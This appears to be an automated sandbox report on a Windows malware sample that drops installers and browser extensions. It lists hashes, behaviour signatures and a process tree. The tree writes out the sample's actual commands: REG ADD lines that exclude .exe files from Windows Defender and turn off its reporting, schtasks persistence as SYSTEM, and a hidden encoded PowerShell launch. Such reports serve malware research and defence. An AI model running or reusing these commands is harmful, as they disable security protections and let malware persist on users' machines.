Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
128s -
max time network
131s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
24/12/2022, 00:00
Static task
static1
General
-
Target
fc921cd6873b95c48f85355cf17f92d38f45829e450e60d8eb0639292a20f468.exe
-
Size
7.3MB
-
MD5
97a1d6748fbc7410bfaf6783ded53551
-
SHA1
97a11cdd7e3fa1d864bf02e4073c4245b7ee8c6c
-
SHA256
fc921cd6873b95c48f85355cf17f92d38f45829e450e60d8eb0639292a20f468
-
SHA512
96ac87a283b8cd4bcb08a2ed66ed8472433bb33e7a502d1ab5a62b358334a4e3300169346470201503882cd3760e63c6559a0ef22d81a82ff4be00931938437e
-
SSDEEP
196608:91Olly7F8u0z0XbUgPcrWJ4oQnsz6OuFIVlAeh/FOXh+:3OlLxz+bP0WJ4ovz6OuFIVxBD
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 23 2876 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 1456 Install.exe 4500 Install.exe 3360 dLvnIff.exe 2392 jHkohsw.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2482096546-1136599444-1359412500-1000\Control Panel\International\Geo\Nation jHkohsw.exe -
Loads dropped DLL 1 IoCs
pid Process 2876 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json jHkohsw.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini jHkohsw.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D jHkohsw.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini dLvnIff.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 jHkohsw.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol dLvnIff.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 jHkohsw.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies jHkohsw.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F jHkohsw.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\pjFvAzrMU\MfVUOVd.xml jHkohsw.exe File created C:\Program Files (x86)\pjFvAzrMU\oZXQgM.dll jHkohsw.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak jHkohsw.exe File created C:\Program Files (x86)\GCRfJHsLrQUU2\VxuiPTt.xml jHkohsw.exe File created C:\Program Files (x86)\nVxaeCGGUgNesTsLMyR\yJEVOrU.dll jHkohsw.exe File created C:\Program Files (x86)\RsrRlNSOmQpSC\ZRvOMsD.xml jHkohsw.exe File created C:\Program Files (x86)\RsrRlNSOmQpSC\KsrODal.dll jHkohsw.exe File created C:\Program Files (x86)\dvcQCBtrcHUn\lddOZna.dll jHkohsw.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi jHkohsw.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi jHkohsw.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja jHkohsw.exe File created C:\Program Files (x86)\GCRfJHsLrQUU2\voLZzXjQIgpMI.dll jHkohsw.exe File created C:\Program Files (x86)\nVxaeCGGUgNesTsLMyR\qniiaSZ.xml jHkohsw.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak jHkohsw.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bAekpXbeORPoFqoXcn.job schtasks.exe File created C:\Windows\Tasks\EYwoUjzpSpPCMYcxX.job schtasks.exe File created C:\Windows\Tasks\hJUayhHcLKanQXB.job schtasks.exe File created C:\Windows\Tasks\okLkyXunDVQVEvYWW.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4684 schtasks.exe 3904 schtasks.exe 4880 schtasks.exe 5048 schtasks.exe 4544 schtasks.exe 2564 schtasks.exe 528 schtasks.exe 3656 schtasks.exe 1836 schtasks.exe 1392 schtasks.exe 4128 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{fa3b18df-0000-0000-0000-d01200000000}\MaxCapacity = "15140" jHkohsw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket jHkohsw.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache jHkohsw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" jHkohsw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" jHkohsw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume jHkohsw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ jHkohsw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing jHkohsw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" jHkohsw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2192 powershell.EXE 2192 powershell.EXE 2192 powershell.EXE 3576 powershell.exe 3576 powershell.exe 3576 powershell.exe 4204 powershell.exe 4204 powershell.exe 4204 powershell.exe 4764 powershell.EXE 4764 powershell.EXE 4764 powershell.EXE 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe 2392 jHkohsw.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2192 powershell.EXE Token: SeDebugPrivilege 3576 powershell.exe Token: SeDebugPrivilege 4204 powershell.exe Token: SeDebugPrivilege 4764 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2300 wrote to memory of 1456 2300 fc921cd6873b95c48f85355cf17f92d38f45829e450e60d8eb0639292a20f468.exe 66 PID 2300 wrote to memory of 1456 2300 fc921cd6873b95c48f85355cf17f92d38f45829e450e60d8eb0639292a20f468.exe 66 PID 2300 wrote to memory of 1456 2300 fc921cd6873b95c48f85355cf17f92d38f45829e450e60d8eb0639292a20f468.exe 66 PID 1456 wrote to memory of 4500 1456 Install.exe 67 PID 1456 wrote to memory of 4500 1456 Install.exe 67 PID 1456 wrote to memory of 4500 1456 Install.exe 67 PID 4500 wrote to memory of 748 4500 Install.exe 69 PID 4500 wrote to memory of 748 4500 Install.exe 69 PID 4500 wrote to memory of 748 4500 Install.exe 69 PID 4500 wrote to memory of 764 4500 Install.exe 70 PID 4500 wrote to memory of 764 4500 Install.exe 70 PID 4500 wrote to memory of 764 4500 Install.exe 70 PID 764 wrote to memory of 4748 764 forfiles.exe 73 PID 748 wrote to memory of 4272 748 forfiles.exe 74 PID 764 wrote to memory of 4748 764 forfiles.exe 73 PID 764 wrote to memory of 4748 764 forfiles.exe 73 PID 748 wrote to memory of 4272 748 forfiles.exe 74 PID 748 wrote to memory of 4272 748 forfiles.exe 74 PID 4748 wrote to memory of 3988 4748 cmd.exe 76 PID 4748 wrote to memory of 3988 4748 cmd.exe 76 PID 4748 wrote to memory of 3988 4748 cmd.exe 76 PID 4272 wrote to memory of 4724 4272 cmd.exe 75 PID 4272 wrote to memory of 4724 4272 cmd.exe 75 PID 4272 wrote to memory of 4724 4272 cmd.exe 75 PID 4748 wrote to memory of 4928 4748 cmd.exe 77 PID 4748 wrote to memory of 4928 4748 cmd.exe 77 PID 4748 wrote to memory of 4928 4748 cmd.exe 77 PID 4272 wrote to memory of 4648 4272 cmd.exe 78 PID 4272 wrote to memory of 4648 4272 cmd.exe 78 PID 4272 wrote to memory of 4648 4272 cmd.exe 78 PID 4500 wrote to memory of 4880 4500 Install.exe 79 PID 4500 wrote to memory of 4880 4500 Install.exe 79 PID 4500 wrote to memory of 4880 4500 Install.exe 79 PID 4500 wrote to memory of 912 4500 Install.exe 81 PID 4500 wrote to memory of 912 4500 Install.exe 81 PID 4500 wrote to memory of 912 4500 Install.exe 81 PID 2192 wrote to memory of 5016 2192 powershell.EXE 85 PID 2192 wrote to memory of 5016 2192 powershell.EXE 85 PID 4500 wrote to memory of 2368 4500 Install.exe 90 PID 4500 wrote to memory of 2368 4500 Install.exe 90 PID 4500 wrote to memory of 2368 4500 Install.exe 90 PID 4500 wrote to memory of 3656 4500 Install.exe 92 PID 4500 wrote to memory of 3656 4500 Install.exe 92 PID 4500 wrote to memory of 3656 4500 Install.exe 92 PID 3360 wrote to memory of 3576 3360 dLvnIff.exe 95 PID 3360 wrote to memory of 3576 3360 dLvnIff.exe 95 PID 3360 wrote to memory of 3576 3360 dLvnIff.exe 95 PID 3576 wrote to memory of 4924 3576 powershell.exe 97 PID 3576 wrote to memory of 4924 3576 powershell.exe 97 PID 3576 wrote to memory of 4924 3576 powershell.exe 97 PID 4924 wrote to memory of 4984 4924 cmd.exe 98 PID 4924 wrote to memory of 4984 4924 cmd.exe 98 PID 4924 wrote to memory of 4984 4924 cmd.exe 98 PID 3576 wrote to memory of 4800 3576 powershell.exe 99 PID 3576 wrote to memory of 4800 3576 powershell.exe 99 PID 3576 wrote to memory of 4800 3576 powershell.exe 99 PID 3576 wrote to memory of 4748 3576 powershell.exe 100 PID 3576 wrote to memory of 4748 3576 powershell.exe 100 PID 3576 wrote to memory of 4748 3576 powershell.exe 100 PID 3576 wrote to memory of 752 3576 powershell.exe 101 PID 3576 wrote to memory of 752 3576 powershell.exe 101 PID 3576 wrote to memory of 752 3576 powershell.exe 101 PID 3576 wrote to memory of 4624 3576 powershell.exe 102 PID 3576 wrote to memory of 4624 3576 powershell.exe 102
Processes
-
C:\Users\Admin\AppData\Local\Temp\fc921cd6873b95c48f85355cf17f92d38f45829e450e60d8eb0639292a20f468.exe"C:\Users\Admin\AppData\Local\Temp\fc921cd6873b95c48f85355cf17f92d38f45829e450e60d8eb0639292a20f468.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2300 -
C:\Users\Admin\AppData\Local\Temp\7zSD3B0.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Users\Admin\AppData\Local\Temp\7zSDB9F.tmp\Install.exe.\Install.exe /S /site_id "385104"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4272 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4724
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4648
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:764 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4748 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3988
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:4928
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gkhAHYaDN" /SC once /ST 00:57:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4880
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gkhAHYaDN"4⤵PID:912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gkhAHYaDN"4⤵PID:2368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bAekpXbeORPoFqoXcn" /SC once /ST 01:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kuqfyaaoRoeomIaXg\yOuMhmyBioTMOCC\dLvnIff.exe\" KF /site_id 385104 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3656
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5016
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:1556
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:2156
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3952
-
C:\Users\Admin\AppData\Local\Temp\kuqfyaaoRoeomIaXg\yOuMhmyBioTMOCC\dLvnIff.exeC:\Users\Admin\AppData\Local\Temp\kuqfyaaoRoeomIaXg\yOuMhmyBioTMOCC\dLvnIff.exe KF /site_id 385104 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3360 -
